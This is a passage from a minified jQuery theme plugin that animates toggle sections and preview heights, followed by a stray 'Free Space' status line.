previewParAnimateHeight = previewPar.css('height'); previewPar.css('height', previewParCurrentHeight); } // Content toggleContent = parentSection.find('> .toggle-content'); if(parentSection.hasClass('active')) { $(previewPar).animate({ height: previewParAnimateHeight }, self.options.duration, function() { $(this).addClass('preview-active'); }); toggleContent.slideDown(self.options.duration, function() { if(closeElement) { closeElement.trigger('click'); } }); } else { $(previewPar).animate({ height: 0 }, self.options.duration, function() { $(this).removeClass('preview-active'); }); toggleContent.slideUp(self.options.duration); } }); } }; // expose to scope $.extend(theme, { PluginToggle: PluginToggle }); // jquery plugin $.fn.themePluginToggle = function(opts) { return this.map(function() { var $this = $(this); if ($this.data(instanceName)) { return $this.data(instanceName); } else { return new PluginToggle($this, opts); } }); } }).apply(this, [window.theme, jQuery]);
Free Space : 11404988416 Byte